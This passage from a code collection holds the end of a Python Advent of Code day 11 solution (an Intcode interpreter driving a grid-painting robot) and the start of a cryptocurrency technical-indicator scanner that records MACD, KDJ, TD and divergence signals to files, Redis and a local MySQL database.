self.write(params[0], res)\n self.ip += 2\n\n def opcode04(self, params):\n self.output.append(params[0])\n self.ip += 2\n\n def opcode05(self, params):\n p1, p2 = params\n if p1 > 0:\n self.ip = p2\n else:\n self.ip += 3\n\n def opcode06(self, params):\n p1, p2 = params\n if p1 == 0:\n self.ip = p2\n else:\n self.ip += 3\n\n def opcode07(self, params):\n p1, p2, pos = params\n res = 1 if p1 < p2 else 0\n self.write(pos, res)\n self.ip += 4\n\n def opcode08(self, params):\n p1, p2, pos = params\n res = 1 if p1 == p2 else 0\n self.write(pos, res)\n self.ip += 4\n\n def opcode09(self, params):\n self.relativebase.append(self.relativebase[-1] + params[0])\n self.ip += 2\n\n def opcode99(self, index):\n self._processing = False\n self.halt = True\n\n def get_mem_sum(self, what):\n m_id = -1\n m_val = 0\n for i, m in self.mem.items():\n s = sum(\n map(\n lambda x: x[what]\n if str(x[what]).isnumeric()\n else len(str(x[what])) > 5,\n m,\n )\n )\n if m_val < s:\n m_val = s\n m_id = i\n return m_id, m_val\n\n def get_mem_stat(self, what):\n stat = {}\n for i, m in self.mem.items():\n s = sum(\n map(\n lambda x: x[what]\n if str(x[what]).isnumeric()\n else len(str(x[what])) > 5,\n m,\n )\n )\n if s == 0:\n continue\n stat[i] = s\n return stat\n\n def statistics(self):\n statdata = {}\n statdata[\"steps\"] = self.steps\n statdata[\"most read\"], statdata[\"most read count\"] = self.get_mem_sum(\"r\")\n statdata[\"most exec\"], statdata[\"most exec count\"] = self.get_mem_sum(\"e\")\n statdata[\"most write\"], statdata[\"most write count\"] = self.get_mem_sum(\"w\")\n statdata[\"exec\"] = self.get_mem_stat(\"e\")\n statdata[\"read\"] = self.get_mem_stat(\"r\")\n statdata[\"written\"] = self.get_mem_stat(\"w\")\n return statdata\n\ndef heatmap(data, filename, show=True):\n fig, ax = plt.subplots()\n for d, m in [(\"read\", \".\"), (\"written\", \"o\"), (\"exec\", \"x\")]:\n ax.scatter(*zip(*data[d].items()), alpha=0.5, marker=m, label=d)\n ax.grid()\n ax.legend()\n fig.savefig(filename)\n if show:\n plt.show()\n\n\ndef print_memory_info(p):\n for mi, m in p.mem.items():\n print(f\"{mi:>5}\", end=\" \")\n if len(m) > 1:\n for mn in m:\n if mn[\"e\"] != 0:\n print(\"!\" * 100)\n print(f' v: {mn[\"v\"]} r: {mn[\"r\"]} e: {mn[\"e\"]} w: ')\n for pii, pi in mn[\"w\"].items():\n print(f\" {pii}: {pi}\")\n else:\n print(f\"{m}\")\n\n\ndef print_stats(stat):\n for n, v in stat.items():\n print(f\"{n}: {v}\")\n\n\np = p2()\n\nclass drawbot(object):\n directions = ['u', 'l', 'd', 'r']\n drawdir = ['^', '<', 'v', '>']\n step = [(0,1), (-1,0), (0, -1), (1,0)]\n def __init__(self, x,y, startval, off_x=30, off_y=45):\n self.x = x\n self.y = y\n self.off_x = off_x\n self.off_y = off_y\n self.direction = 'u'\n self.grid = defaultdict(lambda: defaultdict(int))\n self.grid[0][0] = startval\n self.steps = 0\n\n def get_color(self):\n return self.grid[self.y][self.x]\n\n def command(self, color, direction):\n self.grid[self.y][self.x] = color\n if direction == 0:\n self.direction = self.directions[(self.directions.index(self.direction)+1)%4]\n else:\n self.direction = self.directions[(self.directions.index(self.direction)-1)%4]\n\n def move(self):\n x,y = self.step[self.directions.index(self.direction)]\n self.x += x\n self.y -= y\n self.steps += 1\n\n def colored(self):\n return sum(map(len, self.grid.values()))\n\ndef print_grid(self):\n print(chr(27)+'[2j')\n print('\\033c')\n print('\\x1bc')\n cnt = 0\n RANGEX=-30,50\n RANGEY=-10,20\n SLEEP=0.0125\n for y in range(RANGEY[1], RANGEY[0], -1):\n for x in range(RANGEX[0], RANGEX[1], 1):\n if x == self.x and y == self.y:\n print(self.drawdir[self.directions.index(self.direction)], end='')\n continue\n if y not in self.grid or not x in self.grid[y]:\n print(' ', end='')\n continue\n v = self.grid[y][x]\n cnt += 1\n if v == 1:\n print(termcolor.colored('█', 'white'), end = '')\n else:\n print(termcolor.colored('░', 'white'), end = '')\n\n print()\n print(cnt)\n time.sleep(SLEEP)\n\ndef part1():\n r = drawbot(0,0,0)\n p = p2()\n p.set_prog(inp)\n \n fig = plt.figure()\n\n RANGEX=-30,50\n RANGEY=-10,20\n SLEEP=0.0125\n grid = [[-1 for x in range(RANGEY[1], RANGEY[0], -1)] for y in range(RANGEX[0], RANGEX[1], 1)]\n plot =plt.matshow(grid, fignum=0)\n def update(frame):\n p.add_input(r.get_color())\n p.run()\n outp = p.output\n r.command(*outp)\n p.output.clear()\n r.move()\n grid = [[-1 for x in range(RANGEY[1], RANGEY[0], -1)] for y in range(RANGEX[0], RANGEX[1], 1)]\n for y in range(RANGEY[1], RANGEY[0], -1):\n for x in range(RANGEX[0], RANGEX[1], 1):\n if y not in r.grid or not x in r.grid[y]:\n grid[x][y] = -1\n continue\n grid[x][y] = r.grid[y][x]\n grid.append(grid)\n plot.set_data(grid)\n return [plot]\n\n while not p.halt:\n p.add_input(r.get_color())\n p.run()\n outp = p.output\n r.command(*outp)\n p.output.clear()\n r.move()\n grid = [[-1 for x in range(RANGEY[1], RANGEY[0], -1)] for y in range(RANGEX[0], RANGEX[1], 1)]\n for y in range(RANGEY[1], RANGEY[0], -1):\n for x in range(RANGEX[0], RANGEX[1], 1):\n if y not in r.grid or not x in r.grid[y]:\n grid[y][x] = -1\n continue\n grid[x][y] = r.grid[y][x]\n plot =plt.matshow(grid)\n anim = FuncAnimation(fig, update, interval = 10, blit=True)\n\n plt.show()\n\n pass\n\ndef part2():\n r = drawbot(0,0,1,0,0)\n p = p2()\n p.set_prog(inp)\n while not p.halt:\n p.add_input(r.get_color())\n p.run()\n outp = p.output\n r.command(*outp)\n p.output.clear()\n r.move()\n pass\n\n\ndef main():\n if aoc.part_one():\n result = part1()\n print(f'Result: {result}')\n\n if aoc.part_two():\n result = part2()\n print(f'Result: {result}')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day11/module_mplib.py","file_name":"module_mplib.py","file_ext":"py","file_size_in_byte":11744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62443086","text":"\"\"\" Runs the default analyzer, which performs two functions...\n1. Output the signal information to the prompt.\n2. Notify users when a threshold is crossed.\n\"\"\"\n\nfrom copy import deepcopy\n\nimport redis\nimport structlog\nfrom ccxt import ExchangeError\nfrom tenacity import RetryError\n\nfrom analysis import StrategyAnalyzer\nfrom outputs import Output\n\nimport numpy as np\nfrom collections import defaultdict\nimport traceback\nimport json\nimport uuid\nimport os\n\nimport sys\n\nimport mysql.connector\nfrom datetime import date\n\nclass Behaviour():\n \"\"\"Default analyzer which gives users basic trading information.\n \"\"\"\n trendColor = {\n \"分立跳空顶背离\":\"red\",\n \"分立跳空底背离\": \"green\",\n \"段内顶背离\": \"red\",\n \"段内底背离\": \"green\",\n \"接近0轴的macd金叉信号\": \"green\",\n \"TD 底部 9位置\": \"green\",\n \"TD 底部 13位置\": \"green\",\n \"TTD 顶部 9位置\": \"red\",\n \"TTD 顶部 13位置\": \"red\",\n \"TD 底部 1位置\": \"green\",\n \"TD 底部 2位置\": \"green\",\n \"MACD 量能上涨异常\": \"green\",\n \"macd金叉信号\": \"green\",\n \"0轴上macd金叉信号\": \"green\",\n \"macd金叉信号 + DMI\": \"green\",\n \"DMI+\": \"green\",\n \"TD+底部2B信号\": \"green\",\n \"底部2B信号\": \"green\",\n \"沾到ema30/ema60\": \"green\",\n \"kdj金叉信号\": \"green\",\n \"cci over 100\": \"green\"\n }\n\n mydb = mysql.connector.connect(\n host=\"127.0.0.1\", # 数据库主机地址\n user=\"root\", # 数据库用户名\n passwd=\"\", # 数据库密码\n database = \"cs\"\n )\n\n def __init__(self, config, exchange_interface, notifier):\n \"\"\"Initializes DefaultBehaviour class.\n\n Args:\n indicator_conf (dict): A dictionary of configuration for this analyzer.\n exchange_interface (ExchangeInterface): Instance of the ExchangeInterface class for\n making exchange queries.\n notifier (Notifier): Instance of the notifier class for informing a user when a\n threshold has been crossed.\n \"\"\"\n self.logger = structlog.get_logger()\n self.indicator_conf = config.indicators\n self.informant_conf = config.informants\n self.crossover_conf = config.crossovers\n self.exchange_interface = exchange_interface\n self.strategy_analyzer = StrategyAnalyzer()\n self.notifier = notifier\n\n self.indicator_dispatcher = self.strategy_analyzer.indicator_dispatcher()\n self.informant_dispatcher = self.strategy_analyzer.informant_dispatcher()\n output_interface = Output()\n self.output = output_interface.dispatcher\n\n\n def run(self, market_pairs, output_mode):\n \"\"\"The analyzer entrypoint\n\n Args:\n market_pairs (list): List of symbol pairs to operate on, if empty get all pairs.\n output_mode (str): Which console output mode to use.\n \"\"\"\n\n self.logger.info(\"Starting default analyzer...\")\n\n if market_pairs:\n self.logger.info(\"Found configured markets: %s\", market_pairs)\n else:\n self.logger.info(\"No configured markets, using all available on exchange.\")\n\n if sys.argv[4:] and (sys.argv[4] == '-a'):\n self.logger.info(\"Scan all flag set to true. using all available on exchange.\")\n market_pairs = None\n\n market_data = self.exchange_interface.get_exchange_markets(markets = market_pairs)\n\n self.logger.info(\"Using the following exchange(s): %s\", list(market_data.keys()))\n exchange = list(market_data.keys())[0]\n \n (indicatorTypeCoinMap, new_result) = self._get_indicator_data(market_data, output_mode)\n if sys.argv[5:]:\n if (sys.argv[5] == '_get_indicator_data'):\n return indicatorTypeCoinMap\n elif (sys.argv[5] == '_write_strategic_data'):\n return self._write_strategic_data(market_data, output_mode)\n elif (sys.argv[5] == '_write_strategic_data_redis'):\n self.persistInRedis(indicatorTypeCoinMap, exchange)\n else:\n self._notify_strategies_data(indicatorTypeCoinMap, exchange, new_result)\n\n def truncateFile(self):\n f = open(sys.argv[2],'r+')\n f.truncate()\n f.close()\n\n def isCloseTo(self, start, actual, target):\n if((target-actual) / (actual-start) < 0.05):\n return True;\n\n def _notify_strategies_data(self, indicatorTypeCoinMap, exchange, new_result):\n self.truncateFile()\n f = open(sys.argv[2], 'a')\n #self.persistInRedis(indicatorTypeCoinMap, exchange)\n self.persistInEmailFormat(f, indicatorTypeCoinMap);\n self.notifier.notify_all(new_result)\n\n def persistInRedis(self, indicatorTypeCoinMap, exchange):\n r = redis.Redis();\n candle_period = self.indicator_conf['macd'][0]['candle_period']\n for indicator in indicatorTypeCoinMap:\n for coin in indicatorTypeCoinMap[indicator]:\n candle_periods = r.hget(coin, str.encode(indicator).decode('utf-8'))\n r.hset(coin + \"|\" + exchange, str.encode(indicator).decode('utf-8'),\n candle_period if candle_periods is None else candle_periods.decode('utf-8') + \"|\" + candle_period)\n r.close();\n\n def _write_strategic_data(self, market_data, output_mode):\n (indicatorTypeCoinMap, new_result) = self._get_indicator_data(market_data, output_mode)\n\n #UUID for DB storage later\n # fileId = uuid.uuid4().hex\n\n os.chdir(os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + \"/tmp\")\n fileId = list(market_data)[0] + \"-\" + self.indicator_conf['macd'][0]['candle_period'] + \"-\" + \"_write_strategic_data\"\n with open(fileId, 'w+') as f:\n f.write(json.dumps(indicatorTypeCoinMap, sort_keys=True, ensure_ascii=False))\n f.close()\n return fileId\n\n def _get_indicator_data(self, market_data, output_mode):\n (indicatorTypeCoinMap, new_result) = self._apply_strategies(market_data, output_mode)\n return (indicatorTypeCoinMap, new_result)\n\n def persistInPlainFormat(self, f, indicatorTypeCoinMap) :\n #write everything to the email\n for indicator in indicatorTypeCoinMap:\n f.write(\"

    \" + indicator + \"

    \\n\");\n for coin in indicatorTypeCoinMap[indicator]:\n f.write(\"

    币种/交易对:\" + coin.replace('/','') + \" \" + indicator + '

    \\n' );\n f.close();\n\n def persistInEmailFormat(self, f, indicatorTypeCoinMap) :\n #write everything to the email\n for indicator in indicatorTypeCoinMap:\n f.write(\"

    \" + indicator + \"

    \\n\");\n for coin in indicatorTypeCoinMap[indicator]:\n f.write(\"

    币种/交易对:\" + coin.replace('/','') + \" \" + indicator + '

    \\n' );\n f.close();\n\n def detectCoinPairs(self, market_pair):\n return (market_pair.lower().endswith(\"usdt\") or market_pair.lower().endswith(\"usd\")) \\\n and (self.indicator_conf['macd'][0]['candle_period'] in ['6h','12h', '1d', '3d', '1w']);\n\n def _apply_strategies(self, market_data, output_mode):\n \"\"\"Test the strategies and perform notifications as required\n\n Args:\n market_data (dict): A dictionary containing the market data of the symbols to analyze.\n output_mode (str): Which console output mode to use.\n \"\"\"\n indicatorModes = sys.argv[3]\n indicatorTypeCoinMap = defaultdict(list)\n new_result = dict()\n for exchange in market_data:\n if exchange not in new_result:\n new_result[exchange] = dict()\n\n for market_pair in market_data[exchange]:\n\n if not (self.detectCoinPairs(market_pair)):\n continue;\n\n if market_pair not in new_result[exchange]:\n new_result[exchange][market_pair] = dict()\n\n \"\"\"\n set olhcv data\n a bad implementation: this should be performed concurrently\n \"\"\"\n new_result[exchange][market_pair]['indicators'] = self._get_indicator_results(\n exchange,\n market_pair\n )\n\n new_result[exchange][market_pair]['informants'] = self._get_informant_results(\n exchange,\n market_pair\n )\n\n ################################# Indicator data retrieving and strategy\n try:\n\n ohlcv = new_result[exchange][market_pair]['informants']['ohlcv'][0]['result']\n\n upperband = new_result[exchange][market_pair]['informants']['bollinger_bands'][0]['result']['upperband'] ;\n middleband = new_result[exchange][market_pair]['informants']['bollinger_bands'][0]['result']['middleband'] ;\n lowerband = new_result[exchange][market_pair]['informants']['bollinger_bands'][0]['result']['lowerband'] ;\n opened = ohlcv['open'];\n close = ohlcv['close'] ;\n distance_close_open = close - opened;\n low = ohlcv['low'];\n high = ohlcv['high'] ;\n volume = ohlcv['volume'] ;\n plus_di = new_result[exchange][market_pair]['indicators']['plus_di'][0]['result']['plus_di'] ;\n minus_di = new_result[exchange][market_pair]['indicators']['minus_di'][0]['result']['minus_di'] ;\n plus_dm = new_result[exchange][market_pair]['indicators']['plus_dm'][0]['result']['plus_dm'];\n minus_dm = new_result[exchange][market_pair]['indicators']['minus_dm'][0]['result']['minus_dm'];\n delta_di = plus_di - minus_di\n delta_dm = plus_dm - minus_dm\n macd = new_result[exchange][market_pair]['indicators']['macd'][0]['result']['macd']; #white line\n macd_signal = new_result[exchange][market_pair]['indicators']['macd'][0]['result']['macdsignal']; #yellow line\n delta_macd = new_result[exchange][market_pair]['indicators']['macd'][0]['result']['macdhist']; #macd volume\n\n # rsi = new_result[exchange][market_pair]['indicators']['rsi'][0]['result']['rsi'];\n # stoch_slow_k = new_result[exchange][market_pair]['indicators']['stoch_rsi'][0]['result']['slow_k'];\n # stoch_slow_d = new_result[exchange][market_pair]['indicators']['stoch_rsi'][0]['result']['slow_d'];\n kt = new_result[exchange][market_pair]['indicators']['kdj'][0]['result']['k'];\n dt = new_result[exchange][market_pair]['indicators']['kdj'][0]['result']['d'];\n jt = new_result[exchange][market_pair]['indicators']['kdj'][0]['result']['j'];\n\n #cci\n cci = new_result[exchange][market_pair]['indicators']['cci'][0]['result']['cci'];\n ######################################### ema indicator\n #now contains: ema7IsOverEma65 ema7IsOverEma22 ema7IsOverEma33\n # try:\n # ema7 = new_result[exchange][market_pair]['informants']['ema7'][0]['result']['ema'];\n # ema22 = new_result[exchange][market_pair]['informants']['ema22'][0]['result']['ema'];\n ema30 = new_result[exchange][market_pair]['informants']['ema30'][0]['result']['ema'];\n ema60 = new_result[exchange][market_pair]['informants']['ema60'][0]['result']['ema'];\n #\n # ema7IsOverEma65 = self.ema7OverEma65(ema7, ema65);\n # ema7IsOverEma22 = self.ema7OverEma22(ema7, ema22);\n # ema7IsOverEma33 = self.ema7OverEma33(ema7, ema33);\n #\n # # candleOverEma\n # if ema33 is not None:\n # candleIsOverEma = self.candleOverEma(opened, close, ema33)\n #\n # except RuntimeError:\n # print('ema data has errors')\n\n ###################################### td indicator\n indicators = new_result[exchange][market_pair]['indicators']\n td9PositiveFlag = False\n td13PositiveFlag = False\n td9NegativeFlag = False\n td13NegativeFlag = False\n td1PositiveFlag = False\n td2PositiveFlag = False\n\n td9PositiveFlag42B = False\n td13PositiveFlag42B = False\n td1PostiveFlag42B = False\n td2PositiveFlag42B = False\n td9NegativeFlag42B = False\n td13NegativeFlag42B = False\n if('td' in indicators):\n td = indicators['td'][0]['result']['td'];\n (td9PositiveFlag, td9NegativeFlag, td13PositiveFlag, td13NegativeFlag, td1PositiveFlag, td2PositiveFlag) = self.tdDeteminator(2, td)\n\n ###################################### 2B indicator\n # This 2B is based on TD bottom point. It pick ups the 2B point near/at TD 9 point.\n # argrelextrema is not very useful due to massive but not distinguished valley points.\n # peakIndex = new_result[exchange][market_pair]['indicators']['peak_loc'][0]['result']['peak_loc']\n # valleyIndex = new_result[exchange][market_pair]['indicators']['valley_loc'][0]['result']['valley_loc']\n\n #- bottom 2B for later use\n (td9PositiveFlag42B, td9NegativeFlag42B, td13PositiveFlag42B, td13NegativeFlag42B, td1PostiveFlag42B, td2PositiveFlag42B) = self.tdDeteminator(3, td)\n\n ########################################## cci\n isCciOver100 = (cci[len(cci) - 1] > 100) and (cci[len(cci) - 2] < 100)\n\n ########################################## goldenMacdFork\n intersectionValueAndMin = [0, 0]\n if not (len(macd) == 0 \\\n or len(macd_signal) == 0 \\\n or len(delta_macd) == 0):\n\n goldenForkMacd = (\n\n (delta_macd[len(delta_macd)-1] >= 0 and delta_macd[len(delta_macd)-2] <= 0) or\n\n (delta_macd[len(delta_macd)-1] >= 0 and delta_macd[len(delta_macd)-2] >= 0 and delta_macd[len(delta_macd)-3] <= 0)\n )\n\n macdVolumeIncreasesSurprisingly = (delta_macd[len(delta_macd) - 1] >= 0) and (\n delta_macd[len(delta_macd) - 2] >= 0) and (delta_macd[len(delta_macd) - 1] >= (\n delta_macd[len(delta_macd) - 2] * 3))\n\n ############################################## deadForkMacd\n # deadForkMacd = (\n # delta_macd[len(delta_macd) - 1] <= 0 and delta_macd[len(delta_macd) - 2] >= 0\n # )\n #\n # macdVolumeMinusIsDecreased = False\n # (macdVolumeMinus,min) = self.lastNMinusMacdVolume(delta_macd[0:len(delta_macd)-1])\n # if( len(macdVolumeMinus) != 0 and self.lastNMinusDecreased(macdVolumeMinus,min) ):\n # macdVolumeMinusIsDecreased = True\n\n ############################################## goldenForkKdj\n len_k = len(kt)\n len_d = len(dt)\n len_j = len(jt)\n goldenForkKdj = (\n ((dt[len_d-2] >= kt[len_k-2]) and (kt[len_k-2] >= jt[len_j-2]))\n and\n ((dt[len_d-1] <= kt[len_k-1]) and (kt[len_k-1] <= jt[len_j-1]))\n )\n\n ############################################# deadForkKdj\n # deadForkKdj = (\n # ((dt[len_d - 2] <= kt[len_k - 2]) and (kt[len_k - 2] <= jt[len_j - 2]))\n # and\n # ((dt[len_d - 1] >= kt[len_k - 1]) and (kt[len_k - 1] >= jt[len_j - 1]))\n # )\n\n ############################################# dmi\n lastNDMIIsPositiveVolume = (self.lastNDataIsPositive(delta_di, 3) > 0) or (self.lastNDataIsPositive(delta_di, 2) > 0) or (self.lastNDataIsPositive(delta_di, 1) > 0)\n lastNDIIsPositiveFork = self.lastNDMIIsPositive(delta_di, 2)\n lastNDMIsPositiveFork = self.lastNDMIIsPositive(delta_dm, 2)\n\n ############################################# macdBottomDivergence\n hasBottomDivergence = self.detectBottomDivergence(delta_macd, low, macd_signal)\n hasPeakDivergence = self.detectPeakDivergence(delta_macd, high, macd_signal)\n hasMultipleBottomDivergence = self.detectMultipleBottomDivergence(delta_macd, low, macd_signal)\n hasMultiplePeakDivergnce = self.detectMultiplePeakDivergence(delta_macd, high, macd_signal)\n\n ############################################# bollCross\n # bollCross = False\n # if (len(middleband) != 0):\n # delta_close_middleband = close - middleband;\n # delta_low_middleband = low - middleband;\n # if ((delta_close_middleband.iloc[-1] > 0 and delta_low_middleband.iloc[-1] < 0) or\n # (delta_close_middleband.iloc[-2] > 0 and delta_low_middleband.iloc[-2] < 0)\n # ):\n # bollCross = True\n\n ########################################### rsi < 30\n # rsiIsLessThan30 = (rsi[len(rsi)-1] <= 30)\n\n ########################################### detectMacdVolumeIsShrinked\n # detectMacdVolumeIsShrinked = self.detectMacdVolumeShrinked(delta_macd, self.detectFirstMacdPositiveSlotPosition(delta_macd))\n\n ########################################### stochrsi\n # len_sd = len(stoch_slow_d)\n # len_sk = len(stoch_slow_k)\n # stochrsi_goldenfork = (\n # (stoch_slow_d[len_sd-2] >= stoch_slow_k[len_sk-2])\n # and\n # (stoch_slow_d[len_sd-1] <= stoch_slow_k[len_sk-1])\n # )\n #\n # stochrsi_deadfork = (\n # (stoch_slow_d[len_sd - 2] <= stoch_slow_k[len_sk - 2])\n # and\n # (stoch_slow_d[len_sd - 1] >= stoch_slow_k[len_sk - 1])\n # )\n\n ########################################## volume is 3 times greater than before\n # len_volume = len(volume)\n # volumeIsGreater = volume[len_volume-1] >= 3 * volume[len_volume-2]\n\n ############################################ macd正值平滑\n #c(macd+)>5 + D<0.1\n #counts: 10,\n flatPositive = False\n positiveFlag = self.lastNDataIsPositive(delta_macd, 10);\n if(positiveFlag):\n variance, mean, max = self.getVariance(delta_macd, 10);\n # print(market_pair + \"===\" + str(variance) + \"===\" + str(mean) + \"===\" + str(max))\n flatPositive = self.lastNDataIsPositive(delta_macd, 10) and (variance <= 0.01) and (mean/max <= 0.2)\n\n #narrowedBoll\n #(narrowedBoll, test_arr) = self.lastNBoolIsNarrowed((upperband/lowerband)**10, 5) # counts of narrowed points\n #continuousKRise\n lastNKPositive = self.lastNKIsPositive(distance_close_open)\n\n if(indicatorModes == 'custom'):\n\n # if(self.isOverceedingTriangleLine(peakLoc, ohlcv)):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"上升突破三角形\",\n # indicatorTypeCoinMap)\n\n #if (macdVolumeIncreasesSurprisingly):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"MACD 量能上涨异常\",\n # indicatorTypeCoinMap)\n\n #if (td1PositiveFlag):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"TD 底部 1位置\", indicatorTypeCoinMap)\n\n #if (td2PositiveFlag):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"TD 底部 2位置\", indicatorTypeCoinMap)\n\n if (td9NegativeFlag):\n self.printResult(new_result, exchange, market_pair, output_mode, \"TD 底部 9位置\", indicatorTypeCoinMap)\n self.toDb(\"TD 底部 9位置\", exchange, market_pair)\n\n if (td13NegativeFlag):\n self.printResult(new_result, exchange, market_pair, output_mode, \"TD 底部 13位置\", indicatorTypeCoinMap)\n self.toDb(\"TD 底部 13位置\", exchange, market_pair)\n\n #if (td9PositiveFlag):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"TTD 顶部 9位置\", indicatorTypeCoinMap)\n\n #if (td13PositiveFlag):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"TTD 顶部 13位置\", indicatorTypeCoinMap)\n\n if(self.isBottom2B(volume, opened, close) and (hasMultipleBottomDivergence or hasBottomDivergence)) :\n self.printResult(new_result, exchange, market_pair, output_mode, \"背离+底部2B信号\", indicatorTypeCoinMap)\n self.toDb(\"背离+底部2B信号\", exchange, market_pair)\n\n if (td13NegativeFlag42B or td9NegativeFlag42B):\n if (self.isBottom2B(volume, opened, close)):\n self.printResult(new_result, exchange, market_pair, output_mode, \"TD+底部2B信号\", indicatorTypeCoinMap)\n self.toDb(\"TD+底部2B信号\", exchange, market_pair)\n\n #if (self.isBottom2B(volume, opened, close)):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"底部2B信号\",\n # indicatorTypeCoinMap)\n\n if (goldenForkMacd and intersectionValueAndMin[0]):\n self.printResult(new_result, exchange, market_pair, output_mode, \"0轴上macd金叉信号\", indicatorTypeCoinMap)\n self.toDb(\"0轴上macd金叉信号\", exchange, market_pair)\n\n if (lastNDIIsPositiveFork or lastNDMIsPositiveFork):\n self.printResult(new_result, exchange, market_pair, output_mode, \"DMI+\", indicatorTypeCoinMap)\n #\n # if (ema7IsOverEma65):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"7日线上穿65日ema线\", indicatorTypeCoinMap)\n #\n # if (ema7IsOverEma22):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"7日线上穿22日ema线\", indicatorTypeCoinMap)\n #\n # if (ema7IsOverEma33):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"7日线上穿33日ema线\", indicatorTypeCoinMap)\n #\n # if (candleIsOverEma):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"k线上穿33日ema线\", indicatorTypeCoinMap)\n\n # if (flatPositive):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"macd正值平滑\", indicatorTypeCoinMap)\n\n (start, end) = self.detectMacdSlots(delta_macd, 0, 'positive')\n if (goldenForkMacd and (intersectionValueAndMin[0] > 0.2 * 2 * delta_macd[\n self.getIndexOfMacdValley(delta_macd, start, end)])):\n self.printResult(new_result, exchange, market_pair, output_mode, \"接近0轴的macd金叉信号\",\n indicatorTypeCoinMap)\n self.toDb(\"接近0轴的macd金叉信号\", exchange, market_pair)\n\n if ((lastNDIIsPositiveFork or lastNDMIsPositiveFork) and goldenForkMacd):\n self.printResult(new_result, exchange, market_pair, output_mode, \"macd金叉信号 + DMI\",\n indicatorTypeCoinMap)\n self.toDb(\"macd金叉信号 + DMI\", exchange, market_pair)\n\n if (\n ((low[len(low)-1] >= (1-0.05) * ema60[len(ema60)-1] and low[len(low)-1] <= (1+0.05) * ema60[len(ema60)-1])\n or (low[len(low)-1] >= (1-0.05) * ema30[len(ema30)-1] and low[len(low)-1] <= (1+0.05) * ema30[len(ema30)-1])\n or (close[len(close) - 1] >= (1 - 0.05) * ema60[len(ema60) - 1] and close[len(close) - 1] <= (\n 1 + 0.05) * ema60[len(ema60) - 1])\n or (close[len(close) - 1] >= (1 - 0.05) * ema30[len(ema30) - 1] and close[len(close) - 1] <= (\n 1 + 0.05) * ema30[len(ema30) - 1])\n )\n and\n (close[len(close)-1] < opened[len(opened)-1])\n\n ):\n self.printResult(new_result, exchange, market_pair, output_mode, \"沾到ema30/ema60\",\n indicatorTypeCoinMap)\n\n # if (goldenForkMacd and stochrsi_goldenfork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"stochrsi强弱指标金叉 + macd金叉信号\", indicatorTypeCoinMap)\n\n # if (macdBottomDivergence and lastNDMIIsPositiveFork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"macd底背离 + DMI\", indicatorTypeCoinMap)\n\n # if (macdBottomDivergence and stochrsi_goldenfork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"macd底背离 + stochrsi强弱指标金叉\", indicatorTypeCoinMap)\n\n # if (goldenForkKdj and goldenForkMacd):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"kdj金叉信号 + macd金叉信号\", indicatorTypeCoinMap)\n\n if (goldenForkMacd):\n self.printResult(new_result, exchange, market_pair, output_mode, \"macd金叉信号\", indicatorTypeCoinMap)\n\n if (goldenForkKdj):\n self.printResult(new_result, exchange, market_pair, output_mode, \"kdj金叉信号\", indicatorTypeCoinMap)\n\n # if (goldenForkKdj and lastNDMIIsPositiveFork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"kdj金叉信号 + DMI\", indicatorTypeCoinMap)\n\n # if (stochrsi_goldenfork and lastNDMIIsPositiveFork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"stochrsi强弱指标金叉 + DMI\", indicatorTypeCoinMap)\n\n # compound indicator\n if (hasBottomDivergence):\n self.printResult(new_result, exchange, market_pair, output_mode, \"段内底背离\", indicatorTypeCoinMap)\n\n #if (hasPeakDivergence):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"段内顶背离\", indicatorTypeCoinMap)\n\n if (hasMultipleBottomDivergence):\n self.printResult(new_result, exchange, market_pair, output_mode, \"分立跳空底背离\", indicatorTypeCoinMap)\n\n #if (hasMultiplePeakDivergnce):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"分立跳空顶背离\", indicatorTypeCoinMap)\n\n # if (stochrsi_goldenfork and goldenForkKdj and lastNDMIIsPositiveVolume and (delta_macd[len(delta_macd)-1] > delta_macd[len(delta_macd)-2])):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"stochrsi强弱指标金叉 + kdj金叉信号 + DMI+ + macd量能减小\", indicatorTypeCoinMap)\n\n # if (stochrsi_goldenfork and macdIsDecreased):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"stochrsi强弱指标金叉 + macd下跌量能减弱\",\n # indicatorTypeCoinMap)\n\n if (isCciOver100):\n self.printResult(new_result, exchange, market_pair, output_mode, \"cci over 100\", indicatorTypeCoinMap)\n self.toDb(\"cci over 100\", exchange, market_pair)\n######################################################\n except Exception as e:\n print(\"An exception occurred for \" + market_pair + \":\" + exchange)\n print(e)\n traceback.print_exc()\n\n return (indicatorTypeCoinMap, new_result);\n\n def isBottom2B(self, volume, opened, close):\n # -- price\n priceMatches2BPattern = (opened[-3] > close[-3]) and (opened[-2] < close[-2])\\\n and (opened[-2] <= (close[-3] + (opened[-3] - close[-3])*0.05))\\\n and (close[-2] > opened[-3])\n # -- volume\n volumeMatches2BPattern = (volume[-3] < volume[-2])\n\n # -- price\n priceMatches2BPatternMinusOne = (opened[-4] > close[-4]) and (opened[-3] < close[-3])\\\n and (opened[-3] <= (close[-4] + (opened[-4] - close[-4])*0.05))\\\n and (close[-3] > opened[-4])\n # -- volume\n volumeMatches2BPatternMinusOne = (volume[-4] < volume[-3])\n\n # --indicator\n return (priceMatches2BPattern and volumeMatches2BPattern) \\\n or (priceMatches2BPatternMinusOne and volumeMatches2BPatternMinusOne)\n\n def tdDeteminator(self, gap, td):\n td9PositiveFlag = False\n td9NegativeFlag = False\n td13PositiveFlag = False\n td13NegativeFlag = False\n td1PositiveFlag = False\n td2PositiveFlag = 